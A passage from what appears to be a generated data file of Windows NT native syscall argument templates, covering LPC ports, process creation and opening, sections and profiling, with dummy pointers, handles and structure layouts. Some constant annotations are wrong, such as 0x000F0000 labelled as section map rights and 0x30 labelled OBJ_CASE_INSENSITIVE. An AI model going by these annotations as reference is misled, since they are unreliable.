"pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to HANDLE ReceivePortHandle (dummy pointer, receives handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000446" }, { "value": "0x00000446", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct204": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0018", "fieldComment": "Length of data in message (24 bytes)" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0028", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0003", "fieldComment": "Message type (e.g., LPC_CONNECTION_REQUEST)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00b0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000003", "fieldComment": "Message identifier" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Unused in this example" } ] }, "struct205": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length of data in message (16 bytes)" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0002", "fieldComment": "Message type (e.g., LPC_REPLY)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0008", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00c0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000004", "fieldComment": "Message identifier" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Unused in this example" } ] } } }, "NtReplyWaitReplyPort": { "ntFunc": "NtReplyWaitReplyPort", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to LPC_MESSAGE Reply (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct206", "structureValueExpectations": "Message header and data fields for the reply.", "pointedValue": None }, { "value": "0x00000447", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct206": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Length of data in message (16 bytes)" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0002", "fieldComment": "Message type (e.g., LPC_REPLY)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0008", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00d0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000005", "fieldComment": "Message identifier" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Unused in this example" } ] } } }, "NtRequestPort": { "ntFunc": "NtRequestPort", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to LPC_MESSAGE Request (dummy pointer)", "structurePointer": "LPC_MESSAGE", "structureRef": "struct207", "structureValueExpectations": "Message header and data fields for the request.", "pointedValue": None }, { "value": "0x00000448", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct207": { "type": "LPC_MESSAGE", "fields": [ { "fieldName": "DataLength", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length of data in message (32 bytes)" }, { "fieldName": "TotalLength", "fieldType": "USHORT", "fieldValue": "0x0030", "fieldComment": "Total length including header" }, { "fieldName": "Type", "fieldType": "USHORT", "fieldValue": "0x0001", "fieldComment": "Message type (e.g., LPC_REQUEST)" }, { "fieldName": "DataInfoOffset", "fieldType": "USHORT", "fieldValue": "0x0010", "fieldComment": "Offset to data info" }, { "fieldName": "ClientId", "fieldType": "CLIENT_ID", "fieldValue": "0xbadd00e0", "fieldComment": "Pointer to CLIENT_ID (dummy pointer)" }, { "fieldName": "MessageId", "fieldType": "ULONG", "fieldValue": "0x00000006", "fieldComment": "Message identifier" }, { "fieldName": "SectionSize", "fieldType": "ULONG", "fieldValue": "0x00000000", "fieldComment": "Unused in this example" } ] } } }, "NtRequestWaitReplyPort": { "ntFunc": "NtRequestWaitReplyPort", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to LPC_MESSAGE IncomingReply (dummy pointer, commonly None for no reply expected)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to LPC_MESSAGE Request (dummy pointer, typically points to a valid LPC_MESSAGE structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWriteRequestData": { "ntFunc": "NtWriteRequestData", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer, may be None if not needed)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000020" }, { "value": "0x00000010", "additionalComment": "ULONG Length (16 bytes, typical small message)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to buffer (dummy pointer, points to data to write)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xdeadbeef" }, { "value": "0x00000000", "additionalComment": "ULONG DataIndex (0 for first data entry)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to LPC_MESSAGE Request (dummy pointer, typically points to a valid LPC_MESSAGE structure)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE PortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateProcess": { "ntFunc": "NtCreateProcess", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE ExceptionPort (None, not used in most cases)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE DebugPort (None, not used in most cases)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE SectionHandle (None, process will not be based on a section)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN InheritObjectTable (TRUE, inherit handle table from parent)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ParentProcess (dummy handle, typically a valid process handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None for default attributes)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct208", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0FFF", "additionalComment": "ACCESS_MASK DesiredAccess (PROCESS_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to HANDLE ProcessHandle (dummy pointer, receives new process handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct208": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtFlushInstructionCache": { "ntFunc": "NtFlushInstructionCache", "pushes": [ { "value": "0x00001000", "additionalComment": "ULONG NumberOfBytesToFlush (4096 bytes, typical page size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "PVOID BaseAddress (typical image base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtOpenProcess": { "ntFunc": "NtOpenProcess", "pushes": [ { "value": "0xbadd0070", "additionalComment": "Pointer to CLIENT_ID (dummy pointer)", "structurePointer": "CLIENT_ID", "structureRef": "struct209", "structureValueExpectations": "UniqueProcess and UniqueThread identifiers.", "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None for default attributes)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct210", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0FFF", "additionalComment": "ACCESS_MASK AccessMask (PROCESS_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "Pointer to HANDLE ProcessHandle (dummy pointer, receives process handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct209": { "type": "CLIENT_ID", "fields": [ { "fieldName": "UniqueProcess", "fieldType": "HANDLE", "fieldValue": "0x99995555", "fieldComment": "Dummy process identifier value" }, { "fieldName": "UniqueThread", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None or unused example value" } ] }, "struct210": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQueryInformationProcess": { "ntFunc": "NtQueryInformationProcess", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to ULONG ReturnLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000010", "additionalComment": "ProcessInformationLength (16 bytes, typical for PROCESS_BASIC_INFORMATION)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to PROCESS_BASIC_INFORMATION (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "ProcessInformationClass (ProcessBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationProcess": { "ntFunc": "NtSetInformationProcess", "pushes": [ { "value": "0x00000008", "additionalComment": "ProcessInformationLength (8 bytes, typical for setting a ULONG value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to process information buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000001", "additionalComment": "ProcessInformationClass (ProcessBreakOnTermination)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtTerminateProcess": { "ntFunc": "NtTerminateProcess", "pushes": [ { "value": "0xC0000005", "additionalComment": "NTSTATUS ExitStatus (STATUS_ACCESS_VIOLATION as example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "RtlCreateUserProcess": { "ntFunc": "RtlCreateUserProcess", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to RTL_USER_PROCESS_INFORMATION (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000000", "additionalComment": "HANDLE ExceptionPort (None, not used in most cases)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE DebugPort (None, not used in most cases)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "BOOLEAN InheritHandles (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ParentProcess (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PSECURITY_DESCRIPTOR ThreadSecurityDescriptor (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PSECURITY_DESCRIPTOR ProcessSecurityDescriptor (None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to RTL_USER_PROCESS_PARAMETERS (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0050" }, { "value": "0x00000030", "additionalComment": "ULONG ObjectAttributes (OBJ_CASE_INSENSITIVE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to UNICODE_STRING ImagePath (dummy pointer)", "structurePointer": "UNICODE_STRING", "structureRef": "struct211", "structureValueExpectations": "Points to a UNICODE_STRING describing the image path.", "pointedValue": None } ], "structures": { "struct211": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0020", "fieldComment": "Length in bytes of the string" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0040", "fieldComment": "Maximum length in bytes" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0xbadd0090", "fieldComment": "Pointer to wide string buffer (dummy pointer)" } ] } } }, "NtCreateProfile": { "ntFunc": "NtCreateProfile", "pushes": [ { "value": "0x00000001", "additionalComment": "KAFFINITY Affinity (CPU 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "KPROFILE_SOURCE ProfileSource (ProfileTime)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG BufferSize (4096 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000010", "additionalComment": "ULONG BucketSize (16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00020000", "additionalComment": "ULONG ImageSize (128 KB)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00400000", "additionalComment": "PVOID ImageBase (typical PE base address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE Process (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0080", "additionalComment": "Pointer to HANDLE ProfileHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": {} }, "NtQueryIntervalProfile": { "ntFunc": "NtQueryIntervalProfile", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG Interval (None, typical for querying only)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "KPROFILE_SOURCE ProfileSource (ProfileTime, common value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetIntervalProfile": { "ntFunc": "NtSetIntervalProfile", "pushes": [ { "value": "0x00002710", "additionalComment": "ULONG Interval (10,000, typical timer interval)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "KPROFILE_SOURCE Source (ProfileTime, common value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtStartProfile": { "ntFunc": "NtStartProfile", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE ProfileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtStopProfile": { "ntFunc": "NtStopProfile", "pushes": [ { "value": "0x0000abcd", "additionalComment": "HANDLE ProfileHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateSection": { "ntFunc": "NtCreateSection", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to HANDLE SectionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x000F001F", "additionalComment": "ACCESS_MASK DesiredAccess (SECTION_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None for anonymous section)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct212", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to LARGE_INTEGER MaximumSize (dummy pointer, commonly used for section size)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct213", "structureValueExpectations": "QuadPart field specifying maximum section size.", "pointedValue": None }, { "value": "0x00000004", "additionalComment": "ULONG SectionPageProtection (PAGE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x08000000", "additionalComment": "ULONG AllocationAttributes (SEC_COMMIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "HANDLE FileHandle (None, anonymous section)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct212": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (anonymous section)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct213": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000010000000", "fieldComment": "256 MB section size" } ] } } }, "NtExtendSection": { "ntFunc": "NtExtendSection", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to LARGE_INTEGER NewSectionSize (dummy pointer, commonly None for no change)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct214", "structureValueExpectations": "New size for the section in bytes, or None to not change.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE SectionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct214": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x00020000", "fieldComment": "New section size: 128 KB" } ] } } }, "NtMapViewOfSection": { "ntFunc": "NtMapViewOfSection", "pushes": [ { "value": "0x00000040", "additionalComment": "ULONG Protect (PAGE_EXECUTE_READWRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00001000", "additionalComment": "ULONG AllocationType (MEM_COMMIT)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "DWORD InheritDisposition (ViewShare)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to ULONG ViewSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00002000" }, { "value": "0xbadd0020", "additionalComment": "Pointer to LARGE_INTEGER SectionOffset (dummy pointer, commonly None for start of section)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct215", "structureValueExpectations": "Offset into section, or None for start.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG CommitSize (0 for default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG ZeroBits (0 for default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to PVOID BaseAddress (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00400000" }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, typically current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE SectionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct215": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x00000000", "fieldComment": "Offset 0 (start of section)" } ] } } }, "NtOpenSection": { "ntFunc": "NtOpenSection", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct216", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x000F0000", "additionalComment": "ACCESS_MASK DesiredAccess (SECTION_MAP_READ | SECTION_MAP_WRITE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to HANDLE SectionHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct216": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name, open by handle)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtQuerySection": { "ntFunc": "NtQuerySection", "pushes": [ { "value": "0xbadd0060", "additionalComment": "Pointer to ULONG ResultLength (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000040" }, { "value": "0x00000040", "additionalComment": "ULONG InformationBufferSize (64 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to buffer for section information (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "SECTION_INFORMATION_CLASS (SectionBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "HANDLE SectionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtUnmapViewOfSection": { "ntFunc": "NtUnmapViewOfSection", "pushes": [ { "value": "0x00400000", "additionalComment": "PVOID BaseAddress (example mapped address)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ProcessHandle (dummy handle, typically current process)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateSemaphore": { "ntFunc": "NtCreateSemaphore", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG MaximumCount (example: 16)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG InitialCount (example: 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, often None for unnamed semaphore)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct217", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (example: SEMAPHORE_ALL_ACCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to HANDLE SemaphoreHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct217": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None (unnamed semaphore)" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (unnamed semaphore)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtOpenSemaphore": { "ntFunc": "NtOpenSemaphore", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, typically points to named semaphore)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct218", "structureValueExpectations": "Length/size field; optional root directory handle; pointer to UNICODE_STRING object name; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0003", "additionalComment": "ACCESS_MASK DesiredAccess (example: 